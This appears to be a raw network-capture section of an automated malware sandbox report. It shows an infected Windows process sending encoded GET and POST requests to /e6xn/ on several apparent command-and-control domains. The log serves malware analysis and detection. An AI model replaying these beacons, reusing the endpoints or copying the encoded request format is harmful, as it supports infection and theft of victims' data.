                                                                                  Origin: http://www.d4ffo73dz.sbs
                                                                                  Referer: http://www.d4ffo73dz.sbs/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                   Mar 18, 2024 14:46:30.114397049 CET | 165 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   4 | 192.168.2.10 | 49719 | 47.76.88.64 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Mar 18, 2024 14:46:32.650840998 CET | 499 | OUT | GET /e6xn/?bvOt=CBgiEcAQTvmtp6KW0R4Z7j3tS9oH+Sd4wWgtDPe8rtmYg/trD2DMciPVEqfGjRspk89YWIqewcapqz5yHVGzQ5KlflxjVuoMuuz+sMTok+5fFnqu2w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.d4ffo73dz.sbs
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                   Mar 18, 2024 14:46:32.960242033 CET | 224 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:46:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 2
                                                                                  Last-Modified: Wed, 31 Jan 2024 07:34:05 GMT
                                                                                  Connection: close
                                                                                  ETag: "65b9f7ed-2"
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 31 0a
                                                                                  Data Ascii: 1


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   5 | 192.168.2.10 | 49721 | 144.76.75.181 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   Mar 18, 2024 14:46:38.541470051 CET | 763 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.appmystartup.com
                                                                                  Referer: http://www.appmystartup.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=wMMa0tEvLHWaCI3kbKjUio9SZ+zP6hvIGoUZftkyPzfDH3e09NvHK9tRqUGIwYaxWDGGqfC/O68qhtesGvhp7+SWqtBbeUmXsaNPIlQ5MXl7XZo4IQvYrv4hS6CCsybezrzS3fdNL0syMiE1MCTXTWed93pDhc+wnkcFNuAlwdCkMACHSv6Fb3kSGZMf
                                                                                   Mar 18, 2024 14:46:38.716084957 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:38 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:38.716103077 CET | 115 | IN
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.10 | 49722 | 144.76.75.181 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:46:41.234544992 CET | 787 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.appmystartup.com
                                                                                  Referer: http://www.appmystartup.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=wMMa0tEvLHWaEYHkYpLUqo9RWezPsRvMGoIZfup3Pm3DHTS08PXHL9tRi0G394amWDKgqbK/O6oqhsusG85q7uSUjNBjDkmXsaNPIlFiMXt7Qsg4I0zfov4iX6CC9ibazrz03aF3LyoyMn41MTTUdWebzXottJLruHs/FfAvlvedCBjAD+bSIA4cIf51nVg0nr3UXnT8e5J6HQPdzg==
                                                                                  Mar 18, 2024 14:46:41.409279108 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:41 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:41.409295082 CET | 115 | IN
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  7 | 192.168.2.10 | 49723 | 144.76.75.181 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:46:44.686347008 CET | 1800 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.appmystartup.com
                                                                                  Referer: http://www.appmystartup.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:44.860944986 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:44 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:44.860970020 CET | 115 | IN
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.10 | 49724 | 144.76.75.181 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:46:47.390741110 CET | 502 | OUT | GET /e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.appmystartup.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:47.565624952 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1163
                                                                                  date: Mon, 18 Mar 2024 13:46:47 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc.
                                                                                  Mar 18, 2024 14:46:47.565648079 CET | 115 | IN
                                                                                  Data Ascii: is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.10 | 49725 | 64.190.62.22 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:46:52.992602110 CET | 772 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.hondamechanic.today
                                                                                  Referer: http://www.hondamechanic.today/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=j4dlGiR8I+RJZGGELsAPfy8F/k0pzN9B967HEzFFU8igWZLwAUE50ClVpW8wPxTPn5Shjl3QW5nlnqZk8/hmLAwr1GCDyCEiqMbxmyv+cUJVvtOaNwKqI60NVLF+6p71oaUmq5tlud1KUdOwEnoSKJJZ6u2VZA4Vv7Ivvx/s8Azq1IpglEnobq247pM8
                                                                                  Mar 18, 2024 14:46:53.167927027 CET | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 18 Mar 2024 13:46:53 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: NginX
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.10 | 49726 | 64.190.62.22 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:46:55.688066006 CET | 796 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.hondamechanic.today
                                                                                  Referer: http://www.hondamechanic.today/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:55.863796949 CET | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 18 Mar 2024 13:46:55 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: NginX
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.10 | 49727 | 64.190.62.22 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:46:58.392365932 CET | 1809 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.hondamechanic.today
                                                                                  Referer: http://www.hondamechanic.today/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:46:58.568355083 CET | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 18 Mar 2024 13:46:58 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: NginX
                                                                                  connection: close
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  12 | 192.168.2.10 | 49728 | 64.190.62.22 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:02.369575977 CET | 505 | OUT | GET /e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:02.545206070 CET | 107 | IN | HTTP/1.1 436
                                                                                  date: Mon, 18 Mar 2024 13:47:02 GMT
                                                                                  content-length: 0
                                                                                  server: NginX
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  13 | 192.168.2.10 | 49729 | 104.21.63.135 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:07.758224010 CET | 742 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.oc7o0.top
                                                                                  Referer: http://www.oc7o0.top/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:08.005417109 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:07 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZZqYiDTf2QyGzvCGh9XzBOYjD3dESGrN7r9hCSobAVamBd2rV09PtEGoAFzdZxZdUySYZFpXMgirzoCNdMeJDvNdRvtoooAPefJzU7oJhqA8p7dVQhhoVpagWiXJ94El"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac3dc8956a5e-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  14 | 192.168.2.10 | 49730 | 104.21.63.135 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:10.366528988 CET | 766 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.oc7o0.top
                                                                                  Referer: http://www.oc7o0.top/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:10.623780966 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:10 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pqO838SabKsvOpT0zZ4laadlAk5y1pUhckKgssQBmDBN3XpFPvQDooOGr2tFSRO11kxiyWJKM2ldVQBQMDQNxkPFCtouvrTs4ANPWYqZGD%2FDo3Vh874gF3ydMOY6Kkr"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac4e0f7e0cb0-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.10 | 49731 | 104.21.63.135 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:12.978792906 CET | 1779 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.oc7o0.top
                                                                                  Referer: http://www.oc7o0.top/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:13.235183001 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:13 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMZE5vuItx4vqThD89Yms7hjHFuxopYn%2FWAxs1%2BB1%2FlF%2BU9LKFP6gEuz%2F2GHxKzgqP8A2XbtsolHaK7w9b5WAAGzhGbnFLUQeWtUEOaQDUaNpzup%2Bk3NmLD%2BOvPGZZEr"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac5e6b2d1982-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.10 | 49732 | 104.21.63.135 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:15.585176945 CET | 495 | OUT | GET /e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:15.840375900 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:15 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFTkrg1f0%2FOz9XnvfUe0QmJb27HhgI6KK%2BzdFTUkbhfnu%2BavWoc73mJY5gPx5wVxC2FISvk78%2FpCcQ94roZ6D7scUIqfumnwFlQK3I4OQylqW675TLD%2BF8NtZiBdtrGz"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac6ead070fa5-EWR
                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
